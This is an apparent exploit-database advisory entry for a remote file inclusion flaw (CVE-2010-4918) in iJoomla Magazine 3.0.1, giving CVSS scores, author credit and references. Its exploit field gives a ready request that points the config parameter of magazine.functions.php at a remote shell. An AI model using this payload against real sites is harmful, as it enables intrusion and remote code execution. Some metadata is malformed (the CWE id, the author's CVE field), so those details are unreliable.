iJoomla Magazine 3.0.1 Remote File Inclusion Vulnerability Date: 2010-09-06 Remote: Yes Risk: High CVE: CVE-2010-4918 CWE: CWE-42a94 CVSS Base Score: 7.5/10 Exploit Range: Remote Confidentiality Impact: Partial Impact Subscore: 6.4/10 Attack Complexity: Low Integrity Impact: Partial Exploitability Subscore: 10/10 Authentication: No required Availability Impact: Partial Exploit Details Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion] Date: [5-9-2010] Author: [LoSt.HaCKeR ~ aDaM_TRoJaN] Software Link: [http://www.iJoomla.com/iJoomla-magazine/iJoomla-magazine/index/] Version: [v 3.0.1] Tested on: [Windows XP] CVE: [Hacker town of Musayyib] Contact: [LoSt.HaCKeR[at]yahoo[dot]com ~Or~ aDaM_TRoJaN@yahoo.com] Exploit: [http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]] References http://xforce.iss.net/xforce/xfdb/61598 http://www.exploit-db.com/exploits/14896 http://packetstormsecurity.org/1009-exploits/ijoomlamagazine-rfi.txt